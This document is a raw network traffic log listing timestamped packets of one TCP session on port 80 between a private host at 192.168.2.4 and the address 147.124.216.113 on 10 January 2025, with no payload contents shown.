Jan 10, 2025 08:59:08.402678967 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:08.402678967 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:08.402709007 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.402750015 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.402782917 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.402798891 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:08.402820110 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.402833939 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:08.402854919 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.402887106 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.402908087 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:08.402919054 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.402951956 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.402985096 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.403004885 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:08.403017998 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.403037071 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:08.403047085 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.403080940 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.403095007 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:08.403114080 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.403146982 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.403160095 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:08.403181076 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.403213978 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.403234959 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:08.403248072 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.403280973 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.403301001 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:08.403342962 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.403386116 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.403410912 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:08.403419018 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.403450966 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.403476000 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:08.403484106 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.403517008 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.403531075 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:08.403549910 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.403580904 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.403590918 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:08.403614044 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.403645992 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.403670073 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:08.403677940 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.403711081 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.403723955 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:08.403744936 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.403775930 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.403800964 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:08.403810978 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.403842926 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.403856993 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:08.403877974 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.403909922 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.403932095 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:08.403943062 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.403980017 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.403990030 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:08.404089928 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.404123068 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.404146910 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:08.404156923 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.404190063 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.404201984 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:08.404223919 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:08.404273987 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.103224993 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.103297949 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.103368044 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.103420019 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.103454113 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.103487968 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.103521109 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.103554010 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.103586912 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.103590012 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.103590965 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.103590965 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.103636980 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.103668928 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.103702068 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.103734970 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.103740931 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.103740931 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.103766918 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.103769064 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.103800058 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.103833914 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.103868961 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.103899956 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.103933096 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.103965044 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.103997946 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.104029894 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.104063034 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.104069948 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.104094982 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.104110003 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.104127884 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.104135036 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.104159117 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.104192972 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.104202032 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.104224920 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.104257107 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.104269028 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.104289055 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.104321003 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.104343891 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.104352951 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.104386091 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.104398012 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.104418993 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.104450941 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.104459047 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.104484081 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.104527950 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.104533911 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.104566097 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.104605913 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.104612112 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.104635000 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.104666948 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.104691029 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.104700089 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.104732037 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.104756117 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.104763985 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.104796886 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.104813099 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.104829073 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.104863882 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.104870081 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.104897022 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.104928970 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.104943991 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.104963064 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.104996920 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.105004072 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.105037928 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.105070114 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.105083942 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.105103016 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.105135918 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.105159044 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.105170012 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.105214119 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.105220079 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.105262041 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.105314970 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.849387884 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.849459887 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.849494934 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.849528074 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.849561930 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.849613905 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.849648952 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.849680901 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.849692106 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.849692106 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.849714994 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.849765062 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.849769115 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.849816084 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.849817038 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.849848986 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.849889994 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.849898100 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.849921942 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.849967003 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.849978924 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.850008965 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.850047112 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.850073099 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.850107908 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.850140095 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.850164890 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.850172997 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.850204945 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.850229979 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.850236893 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.850270033 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.850292921 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.850301981 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.850343943 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.850351095 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.850383997 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.850414991 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.850425005 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.850447893 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.850478888 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.850492954 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.850512028 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.850544930 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.850558043 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.850578070 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.850611925 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.850629091 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.850645065 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.850677967 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.850702047 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.850713968 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.850769043 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.850867987 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.850900888 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.850933075 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.850945950 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.850965977 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.850997925 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.851022005 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.851030111 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.851063013 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.851087093 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.851095915 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.851129055 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.851138115 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.851161003 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.851198912 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.851221085 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.851227045 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.851278067 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.851389885 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.851422071 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.851454973 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.851469040 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.851488113 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.851521015 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.851545095 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.851552963 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.851586103 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.851598024 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.851619005 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.851651907 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:09.851658106 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:09.901688099 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:12.717276096 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.717335939 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.717374086 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.717406034 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.717439890 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.717473984 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.717489958 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:12.717509031 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.717541933 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.717581987 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.717592955 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:12.717592955 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:12.717592955 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:12.717613935 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.717648029 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.717655897 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:12.717679977 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.717711926 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.717724085 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:12.717746019 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.717778921 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.717787981 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:12.717812061 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.717849970 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.717861891 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:12.717895985 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.717931032 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.717947006 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:12.717963934 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.717997074 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.718005896 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:12.718044996 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.718077898 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.718091965 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:12.718110085 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.718142986 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.718151093 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:12.718175888 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.718209028 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.718235970 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:12.718240976 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.718272924 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.718278885 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:12.718306065 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.718338966 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.718348980 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:12.718372107 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.718405008 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.718414068 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:12.718441010 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.718487024 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:12.718749046 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.718780994 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.718813896 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.718827009 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:12.718847036 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.718880892 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.718890905 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:12.718914032 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.718946934 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.718970060 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:12.718977928 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.719011068 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.719018936 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:12.719043016 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.719075918 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.719091892 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:12.719108105 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.719140053 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.719146013 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:12.719172955 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.719204903 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.719214916 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:12.719238043 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.719270945 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.719296932 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:12.719345093 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.719388008 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:12.719419956 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.719455957 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:12.719499111 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:18.095850945 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.095922947 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.095959902 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.095993996 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096026897 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096059084 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096093893 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096126080 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096158981 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096168041 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:18.096191883 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096225977 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096236944 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:18.096261024 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096271038 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:18.096293926 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096326113 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096330881 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:18.096358061 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096385956 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:18.096393108 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096426964 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096443892 CET	80	49736	147.124.216.113	192.168.2.4
